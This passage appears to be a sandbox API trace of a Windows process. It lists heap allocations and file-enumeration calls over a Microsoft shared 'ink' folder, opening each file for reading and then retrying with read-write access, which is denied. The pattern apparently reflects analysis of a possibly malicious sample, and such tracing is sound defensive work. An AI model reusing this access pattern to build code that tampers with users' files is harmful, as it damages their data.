(HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0099.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.030] AreFileApisANSI () returned 1 [0099.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI", lpUsedDefaultChar=0x0) returned 57 [0099.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.030] AreFileApisANSI () returned 1 [0099.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0099.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 57 [0099.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.030] GetLastError () returned 0x5 [0099.030] GetLastError () returned 0x5 [0099.030] SetLastError (dwErrCode=0x5) [0099.030] GetLastError () returned 0x5 [0099.030] SetLastError (dwErrCode=0x5) [0099.030] GetLastError () returned 0x5 [0099.030] SetLastError (dwErrCode=0x5) [0099.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.031] AreFileApisANSI () returned 1 [0099.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0099.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 57 [0099.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.031] GetLastError () returned 0x5 [0099.031] GetLastError () returned 0x5 [0099.031] SetLastError (dwErrCode=0x5) [0099.031] GetLastError () returned 0x5 [0099.159] SetLastError (dwErrCode=0x5) [0099.159] GetLastError () returned 0x5 [0099.159] SetLastError (dwErrCode=0x5) [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0099.159] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.160] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0099.160] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.160] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0099.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0099.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0099.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.161] AreFileApisANSI () returned 1 [0099.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.161] AreFileApisANSI () returned 1 [0099.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0099.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned 73 [0099.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.162] GetFileType (hFile=0x418) returned 0x1 [0099.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0099.162] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.162] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.162] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.162] CloseHandle (hObject=0x418) returned 1 [0099.162] AreFileApisANSI () returned 1 [0099.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x851c0 [0099.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned 73 [0099.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.163] GetLastError () returned 0x5 [0099.163] GetLastError () returned 0x5 [0099.163] SetLastError (dwErrCode=0x5) [0099.163] GetLastError () returned 0x5 [0099.163] SetLastError (dwErrCode=0x5) [0099.163] GetLastError () returned 0x5 [0099.163] SetLastError (dwErrCode=0x5) [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.163] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8cee0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0099.163] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0099.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0099.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.164] AreFileApisANSI () returned 1 [0099.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi", lpUsedDefaultChar=0x0) returned 70 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.164] AreFileApisANSI () returned 1 [0099.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0099.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8abb8 [0099.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 70 [0099.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.165] GetFileType (hFile=0x368) returned 0x1 [0099.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0099.166] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.166] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.166] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.166] CloseHandle (hObject=0x368) returned 1 [0099.166] AreFileApisANSI () returned 1 [0099.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | 